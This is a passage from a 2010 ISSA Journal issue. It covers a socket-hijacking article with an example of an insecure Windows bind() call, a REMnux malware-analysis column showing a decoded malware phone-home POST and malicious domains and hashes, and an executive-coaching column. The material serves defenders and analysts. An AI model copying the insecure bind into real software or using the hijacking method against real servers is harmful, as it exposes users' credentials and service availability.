—Web Application Vulnerability Scanners – http://www.owasp.org/index.php/Category:Vulnerability_Scanning_Tools.

—“OWASP Testing Guide v3” – http://www.owasp.org/index.php/Category:OWASP_Testing_Project#OWASP_Testing_Guide_v3_2.

—“OWASP Development Guide 2.0.1” – http://www.owasp.org/index.php/Category:OWASP_Guide_Project#tab=Download.

—“Web application security: automated scanning versus manual penetration testing,”

—Danny Allan, strategic research analyst, IBM Software Group – ftp://ftp.software.ibm.com/software/rational/web/whitepapers/r_wp_autoscan.pdf.

 Tools

—DirBuster– http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project.

—Live HTTP Headers add-on for Firefox – https://addons.mozilla.org/en-US/firefox/addon/3829.

—Web Developer add-on for Firefox - https://addons.mozilla.org/en-US/firefox/addon/60.

—Tamper Data add-on for Firefox -– https://addons.mozilla.org/en-US/firefox/addon/966.

—XSS Shell – http://labs.portcullis.co.uk/application/xssshell.

—HP SWF Scan – http://www.communities.hp.com/securitysoftware.

—pyAMF – http://pyamf.org.

—Burp – http://portswigger.net/proxy.

—Fiddler2 – http://www.fiddler2.com.

About the Author

Bil Bragg, CISSP, is a penetration tester and ISO 27001 lead auditor at Dionach Ltd. Contact him at bil.bragg@dionach.com.

 

 

Socket Hijacking

By Neelay S. Shah and Rudolph Araujo

 

In this article the authors discuss the socket hijacking vulnerability on Windows, the impact of the vulnerability, and what it takes to successfully exploit the vulnerability. They also review existing mitigating factors, the cause of the vulnerability as well as its remediation.

 

Abstract 

Sockets are one of the most widely used inter-process communication primitives for client-server applications due to a combination of the following factors. Sockets:

·      Allow for bi-directional communication

·      Allow processes to communicate across the network

·      Are supported by most operating systems

What application developers need to be aware of is that attackers can target these same client-server applications by “hijacking” the server socket. Insecurely bound server sockets allow an attacker to bind his own socket on the same port, gaining control of the client connections and ultimately allowing the attacker to successfully steal sensitive application-user information as well as launch denial of service attacks against the application server. In this article we discuss the socket hijacking vulnerability on Windows, the impact of the vulnerability, and what it takes to successfully exploit the vulnerability. We also review existing mitigating factors, the cause of the vulnerability as well as its remediation. This article is intended towards all software developers, architects, testers and system administrators. Foundstone has released a free tool, Foundstone Socket Security Auditor,[22] which identifies the insecurely bound sockets on the local system.

 

Sockets are identified by an IP address and port number. Port numbers can be in the range of 0 to 65535 whereas the IP address can be any of the underlying IP addresses associated with the system including the loopback address. The socket library also supports a wildcard IP address (INADDRY_ANY) that binds the socket to the specified port on all underlying IP addresses associated with the system. This feature is extremely attractive (and hence widely used) from an application development point of view for the following reasons:

·      The application developer does not need to write code to programmatically enumerate the underlying IP addresses (associated with the system) and then use one or more of them to bind the listening server socket.

·       In scenarios where the server has multiple network routable IP addresses, there is no additional overhead needed for exchanging the server’s listening IP address with the client. The client could use any one of the server’s network routable addresses and connect successfully to the server (Figure 1).

However, it is possible to bind more than one socket to the same port. For instance, there could be an application server with a listening socket bound to INADDR_ANY:9000 and another malicious application server with its listening socket bound to 172.23.20.1101:9000.[23] Note that both the applications are running on the same system, the only difference (as far as their listener sockets are concerned) is the binding of the listener socket. The legitimate application server has bound its listening socket to the wildcard IP address (INADDR_ANY) whereas the malicious application server has bound its listening socket to a specific IP address (172.23.20.110).

When the client initiates a connection to the server, the client needs to use the routable address (172.23.20.110) and the port (9000) to connect to the server. When the connection request reaches the server, it is the responsibility of the network stack on the server to forward the connection to the listener. Now there are two sockets listening on the same port (9000), and the network stack can forward the connection to only one of the listening sockets. Thus, the network stack needs to resolve this conflict and choose one of the two sockets to forward the connection to.

For this, the network stack inspects the incoming client request which is targeted for 172.23.20.110:9000. Based on this information, the network stack resolves in favor of the malicious application since it had bound its listening socket specifically on 172.23.20.110. Thus the malicious application gets the client connection and can communicate further with the client. This is referred to as Socket Hijacking, i.e., the malicious application has successfully hijacked the legitimate application’s listener socket. Figure 2 illustrates the client-server communication setup in the event of socket hijacking.

Impact of the vulnerability 

Now that we understand and have discussed socket hijacking in detail, let’s turn our focus towards the impact of the socket hijacking vulnerability; or in other words, what damage an attacker can perform by exploiting the socket hijacking vulnerability?

Hijacking the listener socket of the legitimate server essentially allows the attacker to setup a spoof server and hijack client connections without having to poison the client application in any way, i.e., the client application still connects to the same IP address and the port as before; however, the attacker gets hold of the client connection. Having received the client connection, the attacker will then be in a position to potentially carry out much more damaging things such as:

·      Information Disclosure – Depending on the transport security primitives and the actions the client and the server carry out, based on the messages on the socket, the attacker could gain knowledge of sensitive data such as user credentials and even launch man-in-the-middle attacks.

·      Denial of Service – The real server has no notification of the client connection and as such the attacker would be successful in causing denial of service to legitimate client(s).

Exploiting the vulnerability 

So the next question is: “What does the attacker need in order to successfully exploit this vulnerability?” Following are the key considerations and the mitigating factors with respect to successful exploitation of this vulnerability.

·      The attacker needs to have sufficient access to the system with the vulnerable application. The attacker does not need to have privileged access but needs to be able to execute his malicious application on the system.

·      On Windows Server 2003 and later a default ACL is applied to all sockets and as such a limited rights user cannot hijack a socket opened by a different user unless the application explicitly used an insecure ACL while creating the socket.

·      Ports 0-1023 are privileged ports on Windows XP SP2 and later. On these operating systems, the attacker would need administrator/super-user privileges to hijack sockets which are bound to ports in the range 0-1023.

Identifying the vulnerability 

The vulnerability is introduced due to binding the socket insecurely. Let us look at the signature of an insecure invocation of the “bind” API which is used to bind the socket to the underlying IP address and port. Since the socket is bound to wildcard IP Address (INADDR_ANY), this code snippet is susceptible to “socket hijacking” on Windows:

SOCKET sListener = ::socket(AF_INET, SOCK_STREAM, 0);

//Check for error return code

sockaddr_in service;

service.sin_family = AF_INET;

service.sin_addr.S_un.S_addr = ::htonl(INADDR_ANY);

service.sin_port = htons(9000);

int iRet = ::bind(sListener, (sockaddr*) &service, sizeof(service));

//Check for error return code

About the Authors

Neelay S. Shah is a senior software security consultant at Foundstone Professional Services. Rudolph Araujo is a technical director at Foundstone Professional Services. Questions or comments may be directed to consulting@foundstone.com.

 

Columns

 

toolsmith

REMnux

By Russ McRee – ISSA member, Puget Sound (Seattle), USA Chapter

 

Prerequisites

Virtualization platform – VMWare, VirtualBox, etc.

One skill I believe is a core requirement for a well-rounded incident response team is malware analysis. Perhaps you or your associates may not possess deep reverse engineering talents, but I firmly believe you should know how to use certain tools of the trade and interpret the results effectively.

REMnux is intended to provide a collection of tools that can get you started, to both aid you as you learn and enhance your malware analysis capability, or as part of your regular toolkit.

Lenny Zeltser developed REMnux for his SANS Reverse-Engineering Malware course[24] where he utilizes REMnux as he teaches malware analysis.

As I queried Lenny for this article, he indicated that he finds REMnux particularly useful for analyzing malicious software in two primary use-cases.

First, the malware analyst infects a Windows system in a lab and uses REMnux to run services that malware is looking for, such as HTTP, SMTP, and IRC, etc. To meet this requirement, REMnux includes tools such as TinyHTTPd, fakesmtp and Inspire IRCd, as well as Wireshark, fakedns, and honeyd.

The second use-case includes using REMnux to directly analyze malware in the form of malicious browser scripts, Flash and PDF files, and more. For this, REMnux includes a customized version of SpiderMonkey, jsunpack-n, Origami framework, Didier Steven’s PDF tools, and Flash decompilers.

Lenny prefers reverse-engineering Windows executables on Windows hosts rather than *nix, which is why REMnux doesn’t include Wine. You’ve read endless toolsmith columns where I’ve made use of a compromised Windows XP virtual machine as I share Lenny’s preferences. However, REMnux includes GDB, objdump and Radare to help with shellcode analysis.

Finally, REMnux also includes tools useful for memory forensics such the Volatility Framework and some excellent malware-related plug-ins for it.

Lenny considers REMnux a work in progress and is maintaining a “to-do” list that includes additional tools he’d like to include based on feedback from REMnux users.

He hopes to have an update released in late fall of 2010.

REMnux is meant to be lightweight to allow it to run successfully on hardware that may be a bit dated or that doesn’t include a lot of RAM. To that end it uses Enlightenment as the X window manager, rather than GNOME or KDE. REMnux is built on Ubuntu so you can add any tool you wish using apt-get.

If you wish to incorporate the GNOME desktop, ensure that REMnux can connect to the Internet; then simply run sudo apt-get install ubuntu-desktop with the understanding that 1GB worth of files will be downloaded as a result (nullifying the premise of lightweight ;-)).

I challenge you to make do with the terminal as you use REMnux. You can hone your *nix and malware analysis skills at the same time.

Lightweight also implies that REMnux doesn’t include every single malware analysis tool. The goal is to have the tools the community considers most useful, so that people who are just entering the field of malware analysis have a strong starting point for building and customizing their lab.

Don’t be discouraged when you log onto REMnux and simply see a command shell. Lenny’s goals include the addition of some hints and shortcuts directly into the interface in the next revision.

In the interim I intend to give you some good starting points and you can certainly learn more about the tools installed on REMnux and find additional getting-started hints at the REMnux website.[25]

REMnux configuration

A few immediately useful tips culled from the REMnux site.

You’ll likely want to make use of the SSH server as the easiest method for moving samples and results data to and from your REMnux VM. The commands sshd start and sshd stop will work as expected, but you may need to generate missing keys if you built from the ISO rather than use the available VM appliance:

sudo ssh-keygen -t rsa -f /etc/ssh/ssh_host_rsa_key -N ‘’

sudo ssh-keygen -t dsa -f /etc/ssh/ssh_host_dsa_key -N ‘’

REMnux will automatically pull an IP address as a DHCP client; ifconfig or myip will reveal your address or reacquire your network configuration; use restart-network.

I’ve taken to using Oracle’s VirtualBox for quick, straightforward virtualization. As such I downloaded the REMnux ISO, and booted from same, then took a preliminary snapshot. Remember to take another one after you’ve tweaked REMnux to your liking. If you’re using VMWare, simply download the appliance and you’re good to go.

If you wish to work from Enlightenment (X windows manager), simply execute startx after the VM is fully initialized.

REMnux for services

When you really don’t want malware to phone home via your Internet provider, but you want it to believe it has every capability to do so, fakedns is useful for trapping DNS lookups. A “minimal Python DNS server,” running fakedns is as simple as running sudo fakedns. Remember to point your Windows-based malware analysis VM DNS setting to the REMnux IP address.

If you’d like to interact with IRC-based malware, utilize Inspire IRCd via ircd start.

Your best bet is the really slick little services simulation suite found in INetSim. You’ll have to edit the config file before it will play nicely, but here’s how. Remember if you choose to use INetSim for services, kill fakedns so there is no port contention for 53.

Execute sudo vi /etc/inetsim/inetsim.conf and modify service_bind-address to the match the IP address your VM is configured with. Repeat this step for dns_default_ip.

Thereafter, run sudo inetsim and let loose some badness on your Window malware VM (remember to point DNS accordingly).

INetSim writes to /var/log/inetsim by default including /var/log/inetsim/service.log for service activity captured. Figure 2 shows a brief INetSim log snippet captured after I stomped on a variety of malicious binaries on a Windows VM configured as 192.168.248.113.

Note the entries in Figure 3 where 192.168.248.113 makes a DNS request for www.partizangroup.net then shortly thereafter phones home via port 80. A quick search engine query for partizangroup.net reveals that it was an active malware domain in 2008, added to the DNS-BH (Black Hole DNS Sinkhole).

INetSim writes HTTP POST data to /var/lib/inetsim/http/postdata/. After running sudo cat /var/lib/inetsim/http/postdata/7db070cbb57a0a814a67caf0132ef4299cd30032 > inetsimPOST.txt as seen in Figure 3, I grabbed the output and dropped it to a URL decoder.

What was

praquem=nadielepf%40terra%2Ecom%2Ebr&titulo=HIO%2D66ZKDGUCPVW+Foi+infectado+%3AD&texto=Computador+%2E%2E%2E%2E%3A+HIO%2D66ZKDGUCPVW+00%2D0C%2D29%2D56%2D54%2D89%0D%0AData+%2E%2E%2E%2E%2E%2E%2E%2E%2E%2E%3A+8%2F22%2F2010%0D%0AHora+%2E%2E%2E%2E%2E%2E%2E%2E%2E%2E%3A+9%3A34%3A30+PM%0D%0A&

became

praquem=nadielepf@terra.com.br&titulo=HIO-66ZKDGUCPVW Foi infectado :D&texto=Computador ....: HIO-66ZKDGUCPVW 00-0C-29-56-54-89

Data ..........: 8/22/2010

Hora ..........: 9:34:30 PM

What would have been an email phone home to the bot herder who owned nadielepf@terra.com.br a couple of years ago was neatly captured by INetSim.

REMnux for direct analysis

One of my teammates recently handled an incident that initially looked like a DoS attack as the requests for the service where excessive to the point of causing latency and service degradation.

The GET request was clearly not known-good for one of our services and weirder still the referrer was an URL identifying a GIF file.

GET /fcg-bin/cgi_emotion_list.fcg?uin=454682113&loginuin=&s=&.swf HTTP/1.1

Accept: */*

Accept-Language: zh-CN

Referer: http://img.qqywf.com/logo.gif

Downloading logo.gif to my REMnux VM presented an excellent opportunity to test certain static executable and binary analysis tools included with REMnux.

First, as I suspected that logo.gif was not actually a GIF, I used TrID,[26] a utility designed to identify file types from their binary signatures.

Executing trid logo.gif yielded Figure 4.

Ah, so having confirmed a Flash file, I moved to the Flash tools available, including swftools, flasm, and flare. I ran flasm logo.swf after renaming logo.gif to logo.swf. Flasm disassembles SWF files, including all the timelines and events. Note: Keep in mind that flasm doesn’t support ActionScript 3.1. Lenny only included flasm because of its convenient flasm -x feature to decompress swf files. For disassembling files, it’s better use swfdump -Ddu instead.

The results are written to an output file; in this case logo.flm. Scrolling through the results via cat, I found: http://g.qzone.qq.com/fcg-bin/cgi_emotion_list.fcg?uin=454682113&loginuin=&s=&.swf

This closed the loop on what was happening. The initial GET request for our service included /fcg-bin/cgi_emotion_list.fcg?uin=454682113&loginuin=&s=&.swf as noted above but was obviously resulting in a 404 error as the request resource was located on http://g.qzone.qq.com. Misconfiguration or intentional? Hard to say, but we black holed it given the impact to the service.

Malicious PDFs

Malicious PDF analysis is another strong suit of the tool suite included with REMnux.

You will find Jsunpack-n and Didier Stevens’ PDF tools[27] mentioned earlier useful in this regard.

I grabbed a malicious PDF sample from offensivecomputing.net (MD5: a491ae05103849d8797d1fda034e0bd5, readme.pdf) and put it to use on REMnux as follows.

Didier recommends using pdfid.py first to identify a “given list of strings and count the occurrences (total and obfuscated) of each word.” Jsunpack-n’s pdf.py script would have provided similar functionality.

This list includes /JS and /JavaScript which, when identified in a PDF sample, most often indicate maliciousness. pdfid.py readme.pdf resulted in Figure 5.

With a clear indicator of JavaScript inclusion, you can then use pdf-parser.py to learn further details.

The last handy little script we’ll cover here (there are many more for you to discover and test) is Jim Clausing’s packerid.py. Jim indicates that while he likes PEiD,[28] it’s Windows-only. He wanted a script which uses a PEiD database to identify which packer (if any) is being used by a binary that runs on a *nix OS, so he wrote it for himself.

It’s as easy as running packerid malware.exe.

The output will either be None or as seen in the following examples:

[‘ASPack v2.12 -> Alexey Solodovnikov’](MD5: f7628666adcb35491a925f240f97c634)

[‘ASProtect v1.23 RC1’] (MD5: 01bcd0d218157ce6c0f596676864833c)

Experiment with bytehist too; it helps you visualize statistical data to detect encrypted or packed data.

In conclusion

If you’re looking to develop or accentuate your malware analysis skills, REMnux is a great resource. Keep an eye on the project site for the next release, and by all means send feedback to Lenny. Contact him via lennyzeltser on Twitter and his website at zeltser.com. If the suggestions are useful, they will be incorporated as appropriate.

There are a number of tools found on REMnux, so don’t hesitate to dig in. Read the project web site along with the reference URLs it provides for each tool; your efforts will be rewarded.

Cheers…until next month.

Acknowledgements

Lenny Zeltser, for REMnux, and championing the cause of teaching malware analysis.

About the Author

Russ McRee, GCIH, GCFA, GPEN, CISSP, is team leader and senior security analyst for Microsoft’s Online Services Security Incident Management team. As an advocate of a holistic approach to information security, Russ’ website is holisticinfosec.org. Contact him at russ@holisticinfosec.org.

 

 

Security CXO

Invest in Yourself: Hire an Executive Coach

By Joyce Brocaglia

 

As the role of an information security professional continues to diversify and evolve, one thing has become crystal clear. In order for information security officers to be successful they need to elevate their communication and leadership skills to be on par with senior executives across the organization. This may be a challenging task for many information security officers who have risen from technical roles and have received years of technology training but very little personal development and management training. Information security officers are demanding a seat at the table, but from what I’ve witnessed, many of them have very poor table manners! So the question is: how does one go about developing these table manners? There are a variety of possibilities, but the one solution that will provide results that can have a life-altering effect is executive coaching.

Executive coaching is a tool that if utilized correctly will not only teach you how to be successful in the context of what an organization needs but will also teach life skills that will allow you to bring your best to the table.

Some companies offer programs for you to engage an executive coach. If your company does not, then you have to make the decision of whether you believe the cost benefit is worth investing your personal funds. Since my guess is many of the readers are not offered these services through their employer, I’ll share my knowledge and personal experience to better equip you to make that decision.

My personal experience over the past five years with my executive coach has proved to be both rewarding and enlightening. I consider myself fortunate to have found someone whose opinions I respect and who has provided me with perspectives that I might not otherwise have gained on my own. I found my coach through a recommendation of an executive that I trust who had worked with her.

So how do you go about hiring an executive coach? 

Hiring a coach is truly a matter of buyer beware. Because coaching is currently an unregulated field, there are a ton of people coming from other disciplines like trainers, consultants, human resources specialists, and even psychologists who are simply hanging new shingles and calling themselves coaches.

This is dangerous, because like any other field, coaching has a distinct technology and set of practices that are not learned simply by osmosis. The professional association that serves the field, the International Coach Federation[29] (ICF), has worked hard to establish stringent standards for coaching training programs as well as a rigorous certification process for coaches desiring independent verification of their qualifications. The ICF certifies coaches at the Associate (ACC), Professional (PCC), and Master (MCC) certification levels. There are currently approximately 1200 ICF certified coaches around the world. It is also important for leaders to carefully interview coaches before making hiring decisions to ensure that there is a good match. Coaching involves a technology, but it also involves good chemistry. At the end of the day, coach and client have to be on the same wavelength for it to work.

How is coaching different than the management training you are currently getting at work? Coaching goes well beyond the traditional training and event-based approaches to leadership development that assume that one size fits all and is offered through a course or lecture or takes place over one long weekend. Coaching invites people to look at themselves deeply and holistically, and to develop leadership mastery in the context of their own values, strengths, wants, needs, personal styles, and belief systems. Its benefits unfold and are solidified over a period of time so that it has real-world application. Most importantly, it gets to the core of what really matters and resonates for people, and when you tap into that resource, you release amazing energy for growth and transformation.

One of the things that I found beneficial in understanding my own personality, strengths, and weaknesses were assessments that my coach administered, analyzed, and discussed with me. Assessment tools are simply an additional source of information about a person. As human beings, we all have blind spots, and we do not always see the patterns of our own behavior. Assessments can be useful in helping people to better understand and predict their own tendencies as well as those of others, and to develop effective strategies for responding to those tendencies. To that end, assessments are very useful in the coaching process. They become problematic when people take them too far and use them to label (and thus pigeonhole) themselves or others, or use them as an excuse to justify ineffective behaviors. Assessment results are a valuable source of data, but should not be considered as the panacea that will provide all of the answers.

I’ve found that the greatest benefit of working with an executive coach is that not only has the experience helped me with my leadership skills for the businesses I run, it has truly enhanced and changed my outlook, reactions, and thought processes surrounding many events in my personal life. I feel fortunate to have found such a great coach. My best advice to you is to choose wisely! Take the time to ask the people you trust the most if there is someone that they can recommend; you may also speak with your HR and training departments because even if you do not qualify for a coach, they may have someone that they really like. Most importantly have an initial conversation with the coach to understand his or her process, tools, and approach to your coaching relationship. Once you have checked references and credentials, it is really up to your gut to know if this is someone who you feel you can really click with and get value from.

Your relationship with your coach is very personal and unique. If you do not find the right one off the bat, it does not mean that you won’t benefit from a coach; perhaps you have not found one that suits your style best. I know when I was learning to play golf, it took a few pros before I found one who could say things to me in a way that made sense and I could directly apply to my swing and my game. Others may have given me the same pointers, but for some reason I was able to convert her suggestions into actions I could really do. You need to find a coach that can express ideas and concepts in a way that makes sense to you personally so that you can truly affect change.

About the Author

Joyce Brocaglia is the CEO of Alta Associates, the industry’s trusted advisors specializing in information security recruiting, and the founder of the Executive Women’s Forum (www.ewf-usa.com). Joyce may be reached at www.altaassociates.com and Joyce@altaassociates.com.

 

 

This has been the September 2010 issue of the ISSA Journal.



[1]    Before someone emails me about device vs. user vs. process authentication, I understand this is an oversimplification of a complex process that relies on several perfectly executed human interactions to work. Keys can be compromised and browsers can be hacked.

[2]    Which, depending on the scenario, is not always true. But for the vast majority of the time, it is.

[3]    http://www.trustedcomputinggroup.org.

 

[4]    International Organization for standardization (ISO), “Information Technology - Security Techniques - Information Security Management Systems – Requirements,” ISO 27001, Switzerland, 2005.

[5]    National Institute of Standards and Technology, “Recommended Security Controls for Federal Information Systems and Organizations,” Special Publication 800-53, revision 3, (2009).

 

[6]    PCI Standards Council, “PCI Data Security Standard (DSS,)” (2009).

 

[7]    http://java.sun.com/products/jsp.

 

[8]    For a more detailed discussion of recent revisions to healthcare legislation, visit http://www.hhs.gov/ocr/privacy/hipaa/understanding/index.html and http://healthit.ahrq.gov/portal/server.pt?open=512&objID=650&parentname=CommunityPage&parentid=7&mode=2&in_hi_userid=3882&cached=true.

 

[9]    The required risk analysis implementation specification at § 164.308(a)(1)(ii)(A), obligates a covered entity to “[c]onduct an accurate and thorough assessment of the potential risks and vulnerabilities to the confidentiality, integrity, and availability of electronic protected health information held by the covered entity.”

 

[10]   http://www.hhs.gov/ocr/privacy/hipaa/administrative/securityrule/radraftguidanceintro.html.

 

[11]   http://healthit.hhs.gov/portal/server.pt/gateway/PTARGS_0_10741_848086_0_0_18/Sma%20llPracticeSecurityGuide-1.pdf.

 

[12]   http://www.hhs.gov/ocr/privacy/hipaa/understanding/coveredentities/guidance_breachnotice.html; http://www.hhs.gov/ocr/privacy/hipaa/administrative/breachnotificationrule/index.html.

[13]   See ARRA at Section 13400 (1)(B).

 

[14]   Alexa.com lists Rapidshare.com as the 36th most popular website worldwide. While the accuracy of Alexa rankings should be debated, it is safe to say that Rapidshare outraces competitors such as Megaupload (86th) and Hotfile (199th) – http://www.alexa.com/siteinfo/rapidshare.com.

[15]   http://en.wikipedia.org/wiki/Swarm_downloading.

 

[16]   In reality this file us is just a 300mb TrueCrypt archive with “rabbits” as the key.

 

[17]   http://www.rapidshare.com.

 

[18]   “The company’s Abuse Department … uses a hash filter to block uploads of files identified as unauthorized” – http://www.rapidshare.com/news.html.

 

[19]   http://support.mediafire.com/index.php?_m=knowledgebase&_a=viewarticle&kbarticleid=46&nav=0,2.

[20]   “It’s technically impossible to gather this amount of data without investing a sum in the hundreds of millions of Euros. Furthermore, the storage of download logs is prohibited in many countries. If anyone should legally try to force us to monitor customers to such an extent, we would gladly go through all levels of jurisdiction in order to avoid that” – http://rapidshare.com/privacypolicy.html.

 

[21]   http://rapidshare.com/news.html.

 

[22]   The free tool can be found at http://www.foundstone.com/us/resources-free-tools.asp.

 

[23]   Assuming 172.23.20.110 is the IP addresses associated with the system.

 

[24]   http://LearnREM.com.

 

[25]   http://REMnux.org.

 

[26]   http://mark0.net/soft-trid-e.html.

 

[27]   http://blog.didierstevens.com/programs/pdf-tools.

[28]   http://peid.has.it.

 

[29]   International Coach Federation –
www.coachfederation.org.